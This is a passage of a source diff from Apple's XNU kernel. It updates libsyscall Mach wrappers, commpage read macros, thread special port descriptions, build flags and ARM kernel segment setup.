offset is not a thread special port offset. + */ +const char *mach_thread_special_port_description(int offset); + /* * Returns the port for the given identifier of a host special port. For * instance, passing "HOST_PRIV_PORT" would return 1. @@ -59,6 +65,13 @@ int mach_host_special_port_for_id(const char *id); */ int mach_task_special_port_for_id(const char *id); +/* + * Returns the port for the given identifier of a thread special port. + * + * Returns -1 on error. + */ +int mach_thread_special_port_for_id(const char *id); + __END_DECLS #endif /* !defined(_MACH_PORT_DESCRIPTIONS_) */ diff --git a/libsyscall/mach/mach_init.c b/libsyscall/mach/mach_init.c index 4206401a8..6a976709b 100644 --- a/libsyscall/mach/mach_init.c +++ b/libsyscall/mach/mach_init.c @@ -137,13 +137,13 @@ mach_init_doit(void) if (vm_kernel_page_shift == 0) { #if defined(__x86_64__) || defined(__i386__) - if ((*((uint16_t *)_COMM_PAGE_VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION)) { - vm_kernel_page_shift = *(uint8_t*) _COMM_PAGE_KERNEL_PAGE_SHIFT; + if (COMM_PAGE_READ(uint16_t, VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION) { + vm_kernel_page_shift = COMM_PAGE_READ(uint8_t, KERNEL_PAGE_SHIFT); } else { vm_kernel_page_shift = I386_PGSHIFT; } #else - vm_kernel_page_shift = *(uint8_t*) _COMM_PAGE_KERNEL_PAGE_SHIFT; + vm_kernel_page_shift = COMM_PAGE_READ(uint8_t, KERNEL_PAGE_SHIFT); #endif vm_kernel_page_size = 1 << vm_kernel_page_shift; vm_kernel_page_mask = vm_kernel_page_size - 1; @@ -151,12 +151,12 @@ mach_init_doit(void) if (vm_page_shift == 0) { #if defined(__arm64__) - vm_page_shift = *(uint8_t*) _COMM_PAGE_USER_PAGE_SHIFT_64; + vm_page_shift = COMM_PAGE_READ(uint8_t, USER_PAGE_SHIFT_64); #elif defined(__arm__) - vm_page_shift = *(uint8_t*) _COMM_PAGE_USER_PAGE_SHIFT_32; + vm_page_shift = COMM_PAGE_READ(uint8_t, USER_PAGE_SHIFT_32); #else - if ((*((uint16_t *)_COMM_PAGE_VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION)) { - vm_page_shift = *(uint8_t*) _COMM_PAGE_USER_PAGE_SHIFT_64; + if (COMM_PAGE_READ(uint16_t, VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION) { + vm_page_shift = COMM_PAGE_READ(uint8_t, USER_PAGE_SHIFT_64); } else { vm_page_shift = vm_kernel_page_shift; } diff --git a/libsyscall/mach/mach_port.c b/libsyscall/mach/mach_port.c index 6a305be02..d9f564988 100644 --- a/libsyscall/mach/mach_port.c +++ b/libsyscall/mach/mach_port.c @@ -439,7 +439,7 @@ mach_port_space_basic_info( } static inline mach_port_t -_tsd_get_special_reply_port() +_tsd_get_special_reply_port(void) { return (mach_port_t)(uintptr_t)_os_tsd_get_direct(__TSD_MACH_SPECIAL_REPLY); } diff --git a/libsyscall/mach/mach_vm.c b/libsyscall/mach/mach_vm.c index 8b8dfa3fa..365d9a94b 100644 --- a/libsyscall/mach/mach_vm.c +++ b/libsyscall/mach/mach_vm.c @@ -222,6 +222,36 @@ mach_vm_remap( return rv; } +kern_return_t +mach_vm_remap_new( + mach_port_name_t target, + mach_vm_address_t *address, + mach_vm_size_t size, + mach_vm_offset_t mask, + int flags, + mach_port_name_t src_task, + mach_vm_address_t src_address, + boolean_t copy, + vm_prot_t *cur_protection, + vm_prot_t *max_protection, + vm_inherit_t inheritance) +{ + kern_return_t rv; + + /* {max,cur}_protection is inout */ + rv = _kernelrpc_mach_vm_remap_new(target, address, size, mask, flags, + src_task, src_address, copy, cur_protection, max_protection, + inheritance); + + if (__syscall_logger && rv == KERN_SUCCESS) { + int eventTypeFlags = stack_logging_type_vm_allocate | stack_logging_type_mapped_file_or_shared_mem; + int userTagFlags = flags & VM_FLAGS_ALIAS_MASK; + __syscall_logger(eventTypeFlags | userTagFlags, (uintptr_t)target, (uintptr_t)size, 0, (uintptr_t)*address, 0); + } + + return rv; +} + kern_return_t mach_vm_read( mach_port_name_t target, @@ -301,6 +331,36 @@ vm_remap( return rv; } +kern_return_t +vm_remap_new( + mach_port_name_t target, + vm_address_t *address, + vm_size_t size, + vm_offset_t mask, + int flags, + mach_port_name_t src_task, + vm_address_t src_address, + boolean_t copy, + vm_prot_t *cur_protection, + vm_prot_t *max_protection, + vm_inherit_t inheritance) +{ + kern_return_t rv; + + /* {max,cur}_protection is inout */ + rv = _kernelrpc_vm_remap_new(target, address, size, mask, flags, + src_task, src_address, copy, cur_protection, max_protection, + inheritance); + + if (__syscall_logger) { + int eventTypeFlags = stack_logging_type_vm_allocate | stack_logging_type_mapped_file_or_shared_mem; + int userTagFlags = flags & VM_FLAGS_ALIAS_MASK; + __syscall_logger(eventTypeFlags | userTagFlags, (uintptr_t)target, (uintptr_t)size, 0, (uintptr_t)*address, 0); + } + + return rv; +} + kern_return_t vm_read( mach_port_name_t target, diff --git a/libsyscall/mach/port_descriptions.c b/libsyscall/mach/port_descriptions.c index 2e086c80d..acf8c8390 100644 --- a/libsyscall/mach/port_descriptions.c +++ b/libsyscall/mach/port_descriptions.c @@ -29,6 +29,7 @@ #include #include #include +#include #include #include #include @@ -71,8 +72,9 @@ mach_host_special_port_description(int port) [HOST_SYSPOLICYD_PORT] = "syspolicyd", [HOST_FILECOORDINATIOND_PORT] = "filecoordinationd", [HOST_FAIRPLAYD_PORT] = "fairplayd", + [HOST_IOCOMPRESSIONSTATS_PORT] = "I/O compression stats", }; - _Static_assert(HOST_FAIRPLAYD_PORT == HOST_MAX_SPECIAL_PORT, + _Static_assert(HOST_IOCOMPRESSIONSTATS_PORT == HOST_MAX_SPECIAL_PORT, "all host special ports must have descriptions"); return hsp_descs[port_index]; @@ -92,6 +94,8 @@ mach_task_special_port_description(int port) [TASK_HOST_PORT] = "host", [TASK_NAME_PORT] = "name", [TASK_BOOTSTRAP_PORT] = "bootstrap", + [TASK_INSPECT_PORT] = "inspect", + [TASK_READ_PORT] = "read", [TASK_SEATBELT_PORT] = "seatbelt", [TASK_ACCESS_PORT] = "access", [TASK_DEBUG_CONTROL_PORT] = "debug control", @@ -103,6 +107,26 @@ mach_task_special_port_description(int port) return tsp_descs[port_index]; } +const char * +mach_thread_special_port_description(int port) +{ + int port_index = (int)port; + + if (port_index < 0 || port_index > THREAD_MAX_SPECIAL_PORT) { + return NULL; + } + + static const char *tsp_descs[] = { + [THREAD_KERNEL_PORT] = "kernel", + [THREAD_INSPECT_PORT] = "inspect", + [THREAD_READ_PORT] = "read", + }; + _Static_assert(THREAD_READ_PORT == THREAD_MAX_SPECIAL_PORT, + "all thread special ports must have descriptions"); + + return tsp_descs[port_index]; +} + static int port_for_id_internal(const char *id, const char **ids, int nids) { @@ -166,10 +190,25 @@ mach_task_special_port_for_id(const char *id) SP_ENTRY(TASK_HOST_PORT), SP_ENTRY(TASK_NAME_PORT), SP_ENTRY(TASK_BOOTSTRAP_PORT), + SP_ENTRY(TASK_INSPECT_PORT), + SP_ENTRY(TASK_READ_PORT), SP_ENTRY(TASK_SEATBELT_PORT), SP_ENTRY(TASK_ACCESS_PORT), SP_ENTRY(TASK_DEBUG_CONTROL_PORT), SP_ENTRY(TASK_RESOURCE_NOTIFY_PORT), + }; + + return port_for_id_internal(id, tsp_ids, + sizeof(tsp_ids) / sizeof(tsp_ids[0])); +} + +int +mach_thread_special_port_for_id(const char *id) +{ + static const char *tsp_ids[] = { + SP_ENTRY(THREAD_KERNEL_PORT), + SP_ENTRY(THREAD_INSPECT_PORT), + SP_ENTRY(THREAD_READ_PORT), #undef SP_ENTRY }; diff --git a/libsyscall/mach/task.c b/libsyscall/mach/task.c new file mode 100644 index 000000000..b93a0a256 --- /dev/null +++ b/libsyscall/mach/task.c @@ -0,0 +1,47 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#undef _task_user_ +#include + +extern mach_port_t mach_task_self_; + +boolean_t +mach_task_is_self(task_name_t task) +{ + boolean_t is_self; + kern_return_t kr; + + if (task == mach_task_self_) { + return TRUE; + } + + kr = _kernelrpc_mach_task_is_self(task, &is_self); + + return kr == KERN_SUCCESS && is_self; +} diff --git a/libsyscall/wrappers/__commpage_gettimeofday.c b/libsyscall/wrappers/__commpage_gettimeofday.c index a763dfae4..ccd2b33e3 100644 --- a/libsyscall/wrappers/__commpage_gettimeofday.c +++ b/libsyscall/wrappers/__commpage_gettimeofday.c @@ -55,9 +55,8 @@ __commpage_gettimeofday_internal(struct timeval *tp, uint64_t *tbr_out) volatile uint64_t *gtod_Ticks_scale_p; volatile uint64_t *gtod_Ticks_per_sec_p; - new_commpage_timeofday_data_t *commpage_timeofday_datap; - - commpage_timeofday_datap = (new_commpage_timeofday_data_t *)_COMM_PAGE_NEWTIMEOFDAY_DATA; + COMM_PAGE_SLOT_TYPE(new_commpage_timeofday_data_t) commpage_timeofday_datap = + COMM_PAGE_SLOT(new_commpage_timeofday_data_t, NEWTIMEOFDAY_DATA); gtod_TimeStamp_tick_p = &commpage_timeofday_datap->TimeStamp_tick; gtod_TimeStamp_sec_p = &commpage_timeofday_datap->TimeStamp_sec; diff --git a/libsyscall/wrappers/_libkernel_init.c b/libsyscall/wrappers/_libkernel_init.c index 6440b6098..d1eac6f21 100644 --- a/libsyscall/wrappers/_libkernel_init.c +++ b/libsyscall/wrappers/_libkernel_init.c @@ -30,6 +30,7 @@ #include #include #include +#include #include "_libkernel_init.h" extern int mach_init(void); @@ -81,6 +82,19 @@ __libkernel_init(_libkernel_functions_t fns, _dlsym = fns->dlsym; } mach_init(); +#if TARGET_OS_OSX + for (size_t i = 0; envp[i]; i++) { + +#if defined(__i386__) || defined(__x86_64__) + const char *VM_KERNEL_PAGE_SHIFT_ENV = "VM_KERNEL_PAGE_SIZE_4K=1"; + if (vm_kernel_page_shift != 12 && strcmp(VM_KERNEL_PAGE_SHIFT_ENV, envp[i]) == 0) { + vm_kernel_page_shift = 12; + vm_kernel_page_size = 1 << vm_kernel_page_shift; + vm_kernel_page_mask = vm_kernel_page_size - 1; + } +#endif /* defined(__i386__) || defined(__x86_64__) */ + } +#endif /* TARGET_OS_OSX */ } void diff --git a/libsyscall/wrappers/getiopolicy_np.c b/libsyscall/wrappers/getiopolicy_np.c index e09f849cc..01d462b49 100644 --- a/libsyscall/wrappers/getiopolicy_np.c +++ b/libsyscall/wrappers/getiopolicy_np.c @@ -33,12 +33,7 @@ getiopolicy_np(int iotype, int scope) int policy, error; struct _iopol_param_t iop_param; - if ((iotype != IOPOL_TYPE_DISK && iotype != IOPOL_TYPE_VFS_ATIME_UPDATES && iotype != IOPOL_TYPE_VFS_MATERIALIZE_DATALESS_FILES) || - (scope != IOPOL_SCOPE_PROCESS && scope != IOPOL_SCOPE_THREAD)) { - errno = EINVAL; - policy = -1; - goto exit; - } + /* Do not sanity check iotype and scope, leave it to kernel. */ iop_param.iop_scope = scope; iop_param.iop_iotype = iotype; diff --git a/libsyscall/wrappers/kdebug_trace.c b/libsyscall/wrappers/kdebug_trace.c index d7409d541..af0059562 100644 --- a/libsyscall/wrappers/kdebug_trace.c +++ b/libsyscall/wrappers/kdebug_trace.c @@ -84,7 +84,7 @@ kdebug_typefilter(void) bool kdebug_is_enabled(uint32_t debugid) { - uint32_t state = *((volatile uint32_t *)(uintptr_t)(_COMM_PAGE_KDEBUG_ENABLE)); + uint32_t state = COMM_PAGE_READ(uint32_t, KDEBUG_ENABLE); if (state == 0) { return FALSE; @@ -119,7 +119,7 @@ kdebug_is_enabled(uint32_t debugid) bool kdebug_using_continuous_time(void) { - uint32_t state = *((volatile uint32_t *)(uintptr_t)(_COMM_PAGE_KDEBUG_ENABLE)); + uint32_t state = COMM_PAGE_READ(uint32_t, KDEBUG_ENABLE); return state & KDEBUG_ENABLE_CONT_TIME; } diff --git a/libsyscall/wrappers/mach_approximate_time.c b/libsyscall/wrappers/mach_approximate_time.c index cb199cf07..50fc667b9 100644 --- a/libsyscall/wrappers/mach_approximate_time.c +++ b/libsyscall/wrappers/mach_approximate_time.c @@ -30,9 +30,8 @@ extern uint64_t mach_absolute_time(void); uint64_t mach_approximate_time(void) { - uint8_t supported = *((uint8_t *)_COMM_PAGE_APPROX_TIME_SUPPORTED); - if (supported) { - return *((uint64_t *)_COMM_PAGE_APPROX_TIME); + if (COMM_PAGE_READ(uint8_t, APPROX_TIME_SUPPORTED)) { + return COMM_PAGE_READ(uint64_t, APPROX_TIME); } return mach_absolute_time(); } diff --git a/libsyscall/wrappers/mach_boottime.c b/libsyscall/wrappers/mach_boottime.c index 5028f3a65..4a262e5e3 100644 --- a/libsyscall/wrappers/mach_boottime.c +++ b/libsyscall/wrappers/mach_boottime.c @@ -25,5 +25,5 @@ uint64_t mach_boottime_usec(void) { - return *(uint64_t*)_COMM_PAGE_BOOTTIME_USEC; + return COMM_PAGE_READ(uint64_t, BOOTTIME_USEC); } diff --git a/libsyscall/wrappers/mach_bridge_remote_time.c b/libsyscall/wrappers/mach_bridge_remote_time.c index e90846034..1158c2431 100644 --- a/libsyscall/wrappers/mach_bridge_remote_time.c +++ b/libsyscall/wrappers/mach_bridge_remote_time.c @@ -50,7 +50,8 @@ mach_bridge_remote_time(__unused uint64_t local_time) uint64_t now = 0; struct bt_params params = {}; - volatile struct bt_params *commpage_bt_params_p = (struct bt_params *)_COMM_PAGE_REMOTETIME_PARAMS; + COMM_PAGE_SLOT_TYPE(struct bt_params) commpage_bt_params_p = + COMM_PAGE_SLOT(struct bt_params, REMOTETIME_PARAMS); volatile uint64_t *base_local_ts_p = &commpage_bt_params_p->base_local_ts; volatile uint64_t *base_remote_ts_p = &commpage_bt_params_p->base_remote_ts; volatile double *rate_p = &commpage_bt_params_p->rate; diff --git a/libsyscall/xcodescripts/mach_install_mig.sh b/libsyscall/xcodescripts/mach_install_mig.sh index f51db78e4..ba650e974 100755 --- a/libsyscall/xcodescripts/mach_install_mig.sh +++ b/libsyscall/xcodescripts/mach_install_mig.sh @@ -33,7 +33,9 @@ cd $OBJROOT MIG=`xcrun -sdk "$SDKROOT" -find mig` MIGCC=`xcrun -sdk "$SDKROOT" -find cc` export MIGCC -MIG_DEFINES="-DLIBSYSCALL_INTERFACE" +[ -n "$DRIVERKITROOT" ] && MIG_DRIVERKIT_DEFINES="-DDRIVERKIT" +MIG_DEFINES="-DLIBSYSCALL_INTERFACE $MIG_DRIVERKIT_DEFINES" +MIG_PRIVATE_DEFINES="-DPRIVATE -D_OPEN_SOURCE_ -D__OPEN_SOURCE__" MIG_HEADER_OBJ="$OBJROOT/mig_hdr/include/mach" MIG_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/include/mach" MIG_PRIVATE_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/local/include/mach" @@ -41,8 +43,7 @@ SERVER_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/include/servers" MACH_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/include/mach" MACH_PRIVATE_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/local/include/mach" MIG_INTERNAL_HEADER_DST="$BUILT_PRODUCTS_DIR/internal_hdr/include/mach" -MIG_INCFLAGS="-I${SDKROOT}/${SDK_INSTALL_HEADERS_ROOT}/usr/include -I${SDKROOT}/${SDK_INSTALL_HEADERS_ROOT}/usr/local/include" -MIG_PRIVATE_DEFS_INCFLAGS="-I${SDKROOT}/${SDK_INSTALL_HEADERS_ROOT}/System/Library/Frameworks/System.framework/PrivateHeaders" +MIG_INCFLAGS="-I${SRCROOT}/../osfmk" SRC="$SRCROOT/mach" FILTER_MIG="$SRCROOT/xcodescripts/filter_mig.awk" @@ -96,6 +97,7 @@ fi MIGS_INTERNAL="mach_port.defs mach_vm.defs + task.defs thread_act.defs vm_map.defs" @@ -161,7 +163,7 @@ mkdir -p $MIG_PRIVATE_HEADER_DST for mig in $MIGS_PRIVATE $MIGS_DUAL_PUBLIC_PRIVATE; do MIG_NAME=`basename $mig .defs` - $MIG -novouchers -arch $MACHINE_ARCH -cc $MIGCC -header "$MIG_PRIVATE_HEADER_DST/$MIG_NAME.h" $MIG_DEFINES $MIG_INCFLAGS $MIG_PRIVATE_DEFS_INCFLAGS $SRC/$mig + $MIG -novouchers -arch $MACHINE_ARCH -cc $MIGCC -header "$MIG_PRIVATE_HEADER_DST/$MIG_NAME.h" $MIG_DEFINES $MIG_PRIVATE_DEFINES $MIG_INCFLAGS $SRC/$mig if [ ! -e "$MIG_HEADER_DST/$MIG_NAME.h" ]; then echo "#error $MIG_NAME.h unsupported." > "$MIG_HEADER_DST/$MIG_NAME.h" fi @@ -178,4 +180,4 @@ for mig in $MIGS_INTERNAL; do MIG_NAME=`basename $mig .defs` $MIG -novouchers -arch $MACHINE_ARCH -cc $MIGCC -header "$MIG_INTERNAL_HEADER_DST/${MIG_NAME}_internal.h" $MIG_INCFLAGS $SRC/$mig done - + \ No newline at end of file diff --git a/makedefs/MakeInc.cmd b/makedefs/MakeInc.cmd index 63dd0de03..32ac9d6d5 100644 --- a/makedefs/MakeInc.cmd +++ b/makedefs/MakeInc.cmd @@ -209,6 +209,9 @@ endif ifeq ($(NMEDIT),) export NMEDIT := $(shell $(XCRUN) -sdk $(SDKROOT) -find nmedit) endif +ifeq ($(SCAN_BUILD),) + export SCAN_BUILD := $(shell $(XCRUN) -sdk $(SDKROOT) -find scan-build) +endif # # Platform options @@ -258,6 +261,7 @@ SLEEP = /bin/sleep AWK = /usr/bin/awk SED = /usr/bin/sed PLUTIL = /usr/bin/plutil +GREP = /usr/bin/grep # # Command to generate host binaries. Intentionally not diff --git a/makedefs/MakeInc.def b/makedefs/MakeInc.def index 5c5ef1a92..b2e90a4a3 100644 --- a/makedefs/MakeInc.def +++ b/makedefs/MakeInc.def @@ -59,18 +59,18 @@ COMPONENT_LIST = osfmk bsd libkern iokit pexpert libsa security san COMPONENT = $(if $(word 2,$(subst /, ,$(RELATIVE_SOURCE_PATH))),$(word 2,$(subst /, ,$(RELATIVE_SOURCE_PATH))),$(firstword $(subst /, ,$(RELATIVE_SOURCE_PATH)))) COMPONENT_IMPORT_LIST = $(filter-out $(COMPONENT),$(COMPONENT_LIST)) -MACHINE_FLAGS_ARM64_T7000 = -DARM64_BOARD_CONFIG_T7000 -MACHINE_FLAGS_ARM64_T7001 = -DARM64_BOARD_CONFIG_T7001 -MACHINE_FLAGS_ARM64_S8000 = -DARM64_BOARD_CONFIG_S8000 -MACHINE_FLAGS_ARM64_S8001 = -DARM64_BOARD_CONFIG_S8001 +MACHINE_FLAGS_ARM64_T7000 = -DARM64_BOARD_CONFIG_T7000 -mcpu=apple-h7 +MACHINE_FLAGS_ARM64_T7001 = -DARM64_BOARD_CONFIG_T7001 -mcpu=apple-h7 +MACHINE_FLAGS_ARM64_S8000 = -DARM64_BOARD_CONFIG_S8000 -mcpu=apple-h8 +MACHINE_FLAGS_ARM64_S8001 = -DARM64_BOARD_CONFIG_S8001 -mcpu=apple-h8 MACHINE_FLAGS_ARM_T8002 = -DARM_BOARD_CONFIG_T8002 MACHINE_FLAGS_ARM_T8004 = -DARM_BOARD_CONFIG_T8004 MACHINE_FLAGS_ARM64_T8010 = -DARM64_BOARD_CONFIG_T8010 -mcpu=hurricane MACHINE_FLAGS_ARM64_T8011 = -DARM64_BOARD_CONFIG_T8011 -mcpu=hurricane MACHINE_FLAGS_ARM64_BCM2837 = -DARM64_BOARD_CONFIG_BCM2837 MACHINE_FLAGS_ARM64_T8020 = -DARM64_BOARD_CONFIG_T8020 -mcpu=vortex -MACHINE_FLAGS_ARM64_T8101 = -DARM64_BOARD_CONFIG_T8101 -D__ARM_ARCH_8_5__=1 -MACHINE_FLAGS_ARM64_T8103 = -DARM64_BOARD_CONFIG_T8103 -D__ARM_ARCH_8_5__=1 +MACHINE_FLAGS_ARM64_T8101 = -DARM64_BOARD_CONFIG_T8101 -mcpu=apple-a14 +MACHINE_FLAGS_ARM64_T8103 = -DARM64_BOARD_CONFIG_T8103 -mcpu=apple-a14 # @@ -575,6 +575,10 @@ LDFLAGS_KERNEL_RELEASEX86_64 = \ -Wl,-sectalign,__HIB,__cstring,0x1000 \ -Wl,-rename_section,__DATA,__const,__DATA_CONST,__const \ -Wl,-segprot,__DATA_CONST,r--,r-- \ + -Wl,-rename_section,__KLD,__const,__KLDDATA,__const \ + -Wl,-rename_section,__KLD,__cstring,__KLDDATA,__cstring \ + -Wl,-segprot,__KLDDATA,rw-,rw- \ + -Wl,-segprot,__KLD,r-x,r-x \ -Wl,-no_zero_fill_sections \ $(LDFLAGS_NOSTRIP_FLAG) @@ -616,7 +620,11 @@ LDFLAGS_KERNEL_GENARM = \ -Wl,-static \ -Wl,-image_base,0x80001000 \ -Wl,-sectalign,__DATA,__const,0x1000 \ - -Wl,-u,___udivmoddi4 + -Wl,-u,___udivmoddi4 \ + -Wl,-rename_section,__KLD,__const,__KLDDATA,__const \ + -Wl,-rename_section,__KLD,__cstring,__KLDDATA,__cstring \ + -Wl,-segprot,__KLDDATA,rw-,rw- \ + -Wl,-segprot,__KLD,r-x,r-x LDFLAGS_KERNEL_RELEASEARM = \ $(LDFLAGS_KERNEL_GENARM) \ @@ -685,6 +693,10 @@ LDFLAGS_KERNEL_GENARM64 = \ -Wl,-rename_section,__DATA,__auth_got,__DATA_CONST,__auth_got \ -Wl,-rename_section,__DATA,__const,__DATA_CONST,__const \ -Wl,-segprot,__DATA_CONST,r--,r-- \ + -Wl,-rename_section,__KLD,__const,__KLDDATA,__const \ + -Wl,-rename_section,__KLD,__cstring,__KLDDATA,__cstring \ + -Wl,-segprot,__KLDDATA,rw-,rw- \ + -Wl,-segprot,__KLD,r-x,r-x \ -Wl,-rename_section,__TEXT,__text,__TEXT_EXEC,__text \ -Wl,-rename_section,__TEXT,__stubs,__TEXT_EXEC,__stubs \ -Wl,-sectcreate,"__PLK_TEXT_EXEC",__text,/dev/null \ @@ -695,8 +707,8 @@ LDFLAGS_KERNEL_GENARM64 = \ LDFLAGS_KERNEL_SEGARM64 = \ -Wl,-rename_section,__PPLDATA,__const,__PPLDATA_CONST,__const \ - -Wl,-segment_order,__TEXT:__DATA_CONST:__LINKEDIT:__TEXT_EXEC:__PPLTEXT:__PPLTRAMP:__PPLDATA_CONST:__LASTDATA_CONST:__LAST:__PPLDATA:__KLD:__DATA:__HIBDATA:__BOOTDATA \ - -Wl,-segprot,__PPLTEXT,r-x,r-x -Wl,-segprot,__PPLTRAMP,r-x,r-x -Wl,-segprot,__PPLDATA_CONST,r--,r-- -Wl,-segprot,__LASTDATA_CONST,r--,r-- -Wl,-segprot,__LAST,r-x,r-x + -Wl,-segment_order,__TEXT:__DATA_CONST:__LINKEDIT:__TEXT_EXEC:__KLD:__PPLTEXT:__PPLTRAMP:__PPLDATA_CONST:__LASTDATA_CONST:__LAST:__PPLDATA:__KLDDATA:__DATA:__HIBDATA:__BOOTDATA \ + -Wl,-segprot,__PPLTEXT,r-x,r-x -Wl,-segprot,__PPLTRAMP,r-x,r-x -Wl,-segprot,__PPLDATA_CONST,r--,r-- -Wl,-segprot,__LASTDATA_CONST,r--,r-- -Wl,-segprot,__LAST,r-x,r-x \ LDFLAGS_KERNEL_RELEASEARM64 = \ $(LDFLAGS_KERNEL_GENARM64) \ diff --git a/osfmk/UserNotification/KUNCUserNotifications.c b/osfmk/UserNotification/KUNCUserNotifications.c index ae727ba02..59300b656 100644 --- a/osfmk/UserNotification/KUNCUserNotifications.c +++ b/osfmk/UserNotification/KUNCUserNotifications.c @@ -49,6 +49,7 @@ #include #endif +#if CONFIG_USER_NOTIFICATION /* * DEFINES AND STRUCTURES */ @@ -409,6 +410,7 @@ convert_port_to_UNDReply( } return UND_REPLY_NULL; } +#endif /* * User interface for setting the host UserNotification Daemon port. @@ -419,7 +421,12 @@ host_set_UNDServer( host_priv_t host_priv, UNDServerRef server) { +#if CONFIG_USER_NOTIFICATION return host_set_user_notification_port(host_priv, server); +#else +#pragma unused(host_priv, server) + return KERN_NOT_SUPPORTED; +#endif } /* @@ -431,5 +438,10 @@ host_get_UNDServer( host_priv_t host_priv, UNDServerRef *serverp) { +#if CONFIG_USER_NOTIFICATION return host_get_user_notification_port(host_priv, serverp); +#else +#pragma unused(host_priv, serverp) + return KERN_NOT_SUPPORTED; +#endif } diff --git a/osfmk/arm/arm_init.c b/osfmk/arm/arm_init.c index 44610bf50..8fadbf4e7 100644 --- a/osfmk/arm/arm_init.c +++ b/osfmk/arm/arm_init.c @@ -124,6 +124,14 @@ uint64_t interrupt_masked_timeout = 0xd0000; uint64_t stackshot_interrupt_masked_timeout = 0xf9999; #endif +/* + * A 6-second timeout will give the watchdog code a chance to run + * before a panic is triggered by the xcall routine. + */ +#define XCALL_ACK_TIMEOUT_NS ((uint64_t) 6000000000) +uint64_t xcall_ack_timeout_abstime; + + boot_args const_boot_args __attribute__((section("__DATA, __const"))); boot_args *BootArgs __attribute__((section("__DATA, __const"))); @@ -146,6 +154,8 @@ SECURITY_READ_ONLY_LATE(boolean_t) diversify_user_jop = TRUE; SECURITY_READ_ONLY_LATE(uint64_t) gDramBase; SECURITY_READ_ONLY_LATE(uint64_t) gDramSize; +SECURITY_READ_ONLY_LATE(bool) serial_console_enabled = false; + /* * Forward definition */ @@ -435,7 +445,11 @@ arm_init( } PE_parse_boot_argn("interrupt_masked_debug_timeout", &interrupt_masked_timeout, sizeof(interrupt_masked_timeout)); -#endif + +#endif /* INTERRUPT_MASKED_DEBUG */ + + nanoseconds_to_absolutetime(XCALL_ACK_TIMEOUT_NS, &xcall_ack_timeout_abstime); + #if HAS_BP_RET PE_parse_boot_argn("bpret", &bp_ret, sizeof(bp_ret)); @@ -496,6 +510,7 @@ arm_init( } if (serialmode & SERIALMODE_OUTPUT) { /* Start serial if requested */ + serial_console_enabled = true; (void)switch_to_serial_console(); /* Switch into serial mode */ disableConsoleOutput = FALSE; /* Allow printfs to happen */ } diff --git a/osfmk/arm/arm_vm_init.c b/osfmk/arm/arm_vm_init.c index 35f66e5ee..faf5013e2 100644 --- a/osfmk/arm/arm_vm_init.c +++ b/osfmk/arm/arm_vm_init.c @@ -111,6 +111,8 @@ vm_offset_t segLINKB; static unsigned long segSizeLINK; static vm_offset_t segKLDB; static unsigned long segSizeKLD; +static vm_offset_t segKLDDATAB; +static unsigned long segSizeKLDDATA; static vm_offset_t segLASTB; static vm_offset_t segLASTDATACONSTB; static unsigned long segSizeLASTDATACONST; @@ -330,6 +332,7 @@ arm_vm_prot_init(boot_args * args) arm_vm_page_granular_RNX((vm_offset_t)&fiqstack_high_guard, PAGE_MAX_SIZE, TRUE); arm_vm_page_granular_ROX(segKLDB, segSizeKLD, force_coarse_physmap); + arm_vm_page_granular_RNX(segKLDDATAB, segSizeKLDDATA, force_coarse_physmap); arm_vm_page_granular_RWNX(segLINKB, segSizeLINK, force_coarse_physmap); arm_vm_page_granular_RWNX(segLASTB, segSizeLAST, FALSE); // __LAST may be empty, but we cannot assume this if (segLASTDATACONSTB) { @@ -481,6 +484,7 @@ arm_vm_init(uint64_t memory_size, boot_args * args) segDATAB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__DATA", &segSizeDATA); segLINKB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LINKEDIT", &segSizeLINK); segKLDB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLD", &segSizeKLD); + segKLDDATAB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLDDATA", &segSizeKLDDATA); segLASTB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LAST", &segSizeLAST); segLASTDATACONSTB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LASTDATA_CONST", &segSizeLASTDATACONST); segPRELINKTEXTB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PRELINK_TEXT", &segSizePRELINKTEXT); diff --git a/osfmk/arm/bsd_arm.c b/osfmk/arm/bsd_arm.c index ef4fe3d84..084d863a9 100644 --- a/osfmk/arm/bsd_arm.c +++ b/osfmk/arm/bsd_arm.c @@ -34,7 +34,6 @@ #include #include -#include #include #include #include diff --git a/osfmk/arm/counter.c b/osfmk/arm/counter.c new file mode 100644 index 000000000..552e53813 --- /dev/null +++ b/osfmk/arm/counter.c @@ -0,0 +1,81 @@ +/* * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance 